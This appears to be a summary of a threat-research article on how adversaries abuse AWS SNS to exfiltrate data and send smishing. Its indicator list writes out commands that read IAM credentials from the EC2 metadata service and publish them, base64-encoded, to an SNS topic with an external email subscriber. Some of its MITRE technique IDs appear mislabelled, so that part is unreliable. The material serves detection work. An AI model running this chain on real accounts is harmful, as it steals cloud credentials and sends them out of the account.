Threat Research

AWS SNS Abuse: Data Exfiltration and Phishing

Elastic.co

This article explores how threat adversaries exploit AWS’ Simple Notification Service (SNS) for malicious activities such as data exfiltration and phishing campaigns. It outlines techniques used by adversaries, security best practices, and detection strategies for monitoring SNS abuse. The findings emphasize the importance of AWS SNS security to prevent unauthorized access and data loss. Affected: AWS SNS, Cloud Service Providers, Security Operations

Keypoints :

  • AWS SNS allows users to send and receive notifications, with usage often seen in cloud environments.
  • Threat adversaries can leverage SNS for data exfiltration, bypassing traditional security mechanisms.
  • Whitebox testing highlights how malicious behaviors can be emulated in controlled environments.
  • Adversaries can create SNS topics for exfiltrating sensitive data to unauthorized external destinations.
  • Security measures such as IAM role permissions, logging, and monitoring can mitigate risks.
  • Challenges for adversaries include gaining initial access and executing commands without detection.
  • Detection strategies include monitoring for unusual SNS activity such as topic creation and unexpected subscriptions.
  • Phishing campaigns may leverage SNS for distributing fraudulent messages, especially in smishing attacks.

MITRE Techniques :

  • T1408 – Use of Public APIs: Threat actors leverage AWS’ public APIs to exploit SNS for data exfiltration through topic creation and subscription.
  • T1530 – Data from Information Repositories: Adversaries extract sensitive data (e.g., credentials) from EC2 instances and publish it to SNS topics.
  • T1660 – Direct SMS Messaging: Use of SNS for targeted SMS phishing campaigns targeting victims directly.
  • T1608 – Access Token Manipulation: Adversaries manipulate AWS CLI access tokens to perform unauthorized SNS actions.

Indicator of Compromise :

  • [Domain] protonmail.com
  • [Command] aws sns create-topic –name “whitebox-sns-topic”
  • [Command] aws sns subscribe –topic-arn “$TOPIC_ARN” –protocol email –notification-endpoint “[email protected]
  • [Command] aws sns publish –topic-arn “$TOPICARN” –message “$BASE64CONTENT” –subject “Encoded Credentials from EC2”
  • [Command] curl -H “X-aws-ec2-metadata-token: $TOKEN” http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME

Full Story: https://www.elastic.co/security-labs/aws-sns-abuse